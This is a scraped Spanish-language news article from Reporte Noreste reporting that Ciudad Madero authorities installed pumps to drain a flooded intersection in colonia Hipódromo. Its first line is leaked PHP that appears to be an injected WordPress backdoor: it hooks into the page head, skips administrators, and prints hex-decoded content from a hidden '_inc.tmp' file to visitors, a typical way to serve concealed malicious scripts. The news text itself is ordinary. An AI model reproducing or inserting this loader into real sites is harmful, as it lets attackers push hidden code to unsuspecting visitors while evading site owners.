if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Madero brinda ayuda a afectados por lluvias en la colonia Hipódromo – Reporte Noreste
Conéctate con nosotros

Sur de Tamaulipas

Madero brinda ayuda a afectados por lluvias en la colonia Hipódromo

Madero brinda ayuda a afectados por lluvias en la colonia Hipódromo

Ciudad Madero, Tamaulipas.- Residentes de la colonia Hipódromo, solicitaron al Ayuntamiento de Ciudad Madero solucione el problema de un encharcamiento que les impide una correcta movilidad y ya afecta la salud de las personas del sector, interviniendo además personal de Comapa y Protección Civil.

Se trata del cruce de las calles Morelia y Corregidora en el citado sector, en donde el estancamiento del agua dura mucho más que en otras calles, debido a una reciente obra de pavimentación que se realizó a un nivel superior de  las otras calles.

Los residentes del sector acudieron a la Presidencia Municipal en donde dialogaron con el secretario del Ayuntamiento Juan Antonio Ortega, para que acudieran al lugar del problema.

Juan Antonio Ortega, en coordinación con el área técnica de la Comisión de Agua Potable  y Alcantarillado Zona Conurbada, así como Protección Civil, se presentó en el sitio y al conocer la situación llegaron al acuerdo de instalar bombas especiales y largas mangueras para sacar el agua hacia un canal cercano.

De igual forma, para proteger de daños a los vehículos, se procedió a cerrar la circulación en tanto se realizaban dichos trabajos.

Inició carrera en medios en 1996. Ha participado como reportero en medios impresos y electrónicos conductor de noticias en radio y televisión.

Haga clic para comentar

Leave a Reply

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Facebook

Principales

Más en Sur de Tamaulipas